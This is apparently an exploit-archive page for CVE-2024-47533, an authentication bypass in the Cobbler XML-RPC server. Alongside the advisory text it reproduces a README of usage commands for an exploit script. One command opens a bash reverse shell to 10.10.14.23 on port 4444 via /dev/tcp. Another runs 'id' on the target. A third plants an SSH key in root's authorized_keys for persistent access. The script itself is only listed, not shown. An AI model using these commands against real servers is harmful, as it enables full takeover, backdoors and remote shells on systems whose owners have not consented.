Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-47533 PoC — Cobbler allows anyone to connect to cobbler XML-RPC server with a known password and make changes

Source
https://github.com/baph00met/CVE-2024-47533
Associated Vulnerability
Title:Cobbler allows anyone to connect to cobbler XML-RPC server with a known password and make changes (CVE-2024-47533)
Description:Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `''` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.
Description
 CVE-2024-47533: Cobbler Authentication Bypass & Code Execution
Readme
```bash
# Reverse shell
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'bash -c "bash -i >& /dev/tcp/10.10.14.23/4444 0>&1"'

# Simple command
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'id'

# Drop SSH key
python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'mkdir -p /root/.ssh && echo ssh-ed25519 AAAA... >> /root/.ssh/authorized_keys'
```
File Snapshot

 [4.0K]  /data/pocs/2845e1e485a719b728cb502343dcb97c67d0b2c6
├── [2.6K]  CVE-2024-47533.py
└── [ 384]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →